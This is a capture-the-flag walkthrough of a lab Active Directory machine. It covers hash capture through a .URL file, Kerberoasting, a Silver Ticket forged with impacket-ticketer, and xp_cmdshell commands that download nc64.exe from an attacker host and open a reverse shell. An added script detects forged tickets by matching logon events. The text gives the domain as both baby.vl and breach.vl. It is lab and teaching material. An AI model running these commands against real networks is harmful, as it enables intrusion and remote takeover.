Breach


Breach, an Active Directory machine created by xct in vulnlab, employs NTLM hash capture for initial access and utilizes a Silver Ticket attack to gain entry into the network.


Enumeration

Start an nmap scan to look for open ports, adding the necessary flags for in-depth enumeration.

From the scan we can take note of the domain name (baby.vl) and begin null-session enumeration.


Initial Foothold

With SMB null-session enumeration we are able to list some folders.

Enumerating the share further, we find a couple of potential usernames.

Let’s drop a .URL file into the share and see whether a URL file attack is possible.

Immediately we are able to collect a hash.

After the usual enumeration with the newly gained credentials, this user turns out to have no access to the machine itself.

However, we are able to use this user to Kerberoast and obtain the credentials of a service account.

This user has no access to the machine either, but from the nmap scan we can see that the MSSQL port is open.

However, the account only has guest-level privileges on the SQL server.


From the clue in the box description, it seems we are meant to use a Silver Ticket attack.

A Silver Ticket attack is when an attacker forges Kerberos service tickets in Microsoft’s Active Directory, gaining unauthorized access to network resources without legitimate credentials. Because the ticket is built with the service account’s key and presented directly to the service, it is never issued by the KDC. It is a type of attack that exploits weaknesses in the Kerberos authentication protocol.

In order to perform a silver ticket attack we require the following:

  • Domain SID
  • NTLM hash of the service account (here svc_mssql)
  • SPN of the target service

We can get the Domain SID from impacket’s lookupsid:

impacket-lookupsid breach.vl/svc_mssql:'Trustno1'@10.10.78.61

The NTLM hash of the plaintext password can be computed with any browser-based (or offline) NTLM hash tool.

Lastly, the SPN is the one we retrieved during the Kerberoast attack.

To create the Silver Ticket we use impacket-ticketer. Remember to choose Administrator as the user.

impacket-ticketer -nthash '69596C7AA1E8DAEE17F8E78870E25A5C' -domain-sid 'S-1-5-21-2330692793-3312915120-706255856' -domain breach.vl -spn 'MSSQLSvc/breach.vl:1433' -user-id 500 Administrator

Export the ticket so the impacket tools pick it up:

export KRB5CCNAME=Administrator.ccache

We can now use the ticket to authenticate to the MSSQL server.

Since we are Administrator in MSSQL, we can use xp_cmdshell to execute commands.
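On the defensive side, one simple way to spot a forged service ticket is to correlate Kerberos network logons on the service host (Event ID 4624) against the service ticket requests the domain controller logged (Event ID 4769), since a Silver Ticket is never issued by the KDC. The script below is an added example and not part of the original writeup; the event field names and the sample events are constructed, and the 10-hour window assumes the default maximum service ticket lifetime.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events for illustration (not logs from the box).
# 4769 on the domain controller: a client asked the KDC for a service ticket.
DC_TGS_REQUESTS = [
    {"time": "2024-01-10T09:00:00", "user": "john@BREACH.VL",
     "client_ip": "10.10.10.50"},
]
# 4624 on the SQL host: a network (type 3) logon, with the auth package used.
SQL_HOST_LOGONS = [
    {"time": "2024-01-10T09:01:00", "user": "john", "client_ip": "10.10.10.50",
     "logon_type": 3, "package": "Kerberos"},
    {"time": "2024-01-10T09:30:00", "user": "Administrator", "client_ip": "10.10.10.70",
     "logon_type": 3, "package": "Kerberos"},
    {"time": "2024-01-10T09:31:00", "user": "john", "client_ip": "10.10.10.50",
     "logon_type": 3, "package": "NTLM"},
]

TICKET_LIFETIME = timedelta(hours=10)  # assumed default maximum service ticket lifetime


def _norm_user(name):
    # 4769 carries user@REALM while 4624 carries the bare account name
    return name.split("@")[0].lower()


def find_unissued_kerberos_logons(tgs_requests, logons, lifetime=TICKET_LIFETIME):
    """Return Kerberos network logons with no matching TGS request on the DC.

    A Silver Ticket is forged offline with the service account's key and
    presented straight to the service, so the KDC never logs a 4769 for it.
    """
    issued = defaultdict(list)
    for ev in tgs_requests:
        key = (_norm_user(ev["user"]), ev["client_ip"])
        issued[key].append(datetime.fromisoformat(ev["time"]))

    suspicious = []
    for lg in logons:
        if lg["logon_type"] != 3 or lg["package"] != "Kerberos":
            continue  # NTLM and interactive logons are out of scope for this check
        when = datetime.fromisoformat(lg["time"])
        key = (_norm_user(lg["user"]), lg["client_ip"])
        if not any(when - lifetime <= issued_at <= when for issued_at in issued[key]):
            suspicious.append(lg)
    return suspicious


if __name__ == "__main__":
    for lg in find_unissued_kerberos_logons(DC_TGS_REQUESTS, SQL_HOST_LOGONS):
        print(f"{lg['time']}: Kerberos logon as {lg['user']} from {lg['client_ip']} "
              "has no matching 4769 on the DC")
```

In practice both event sets would come from a SIEM export covering every domain controller, since a legitimate ticket may have been requested from any of them.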


After some trial and error, I’m able to get the nc64.exe binary onto the machine. Most of the reverse shell scripts had been blocked by Defender.

xp_cmdshell powershell -c "wget -usebasicparsing http://10.8.1.176:8888/nc64.exe -o C:\Temp\nc64.exe"

Execute the command to connect back to the netcat listener.

xp_cmdshell powershell -c "C:\Temp\nc64.exe -e cmd 10.8.1.176 443"

And we get a shell.


Privilege Escalation

The svc_mssql user has SeImpersonatePrivilege, so we can use JuicyPotato to escalate privileges.
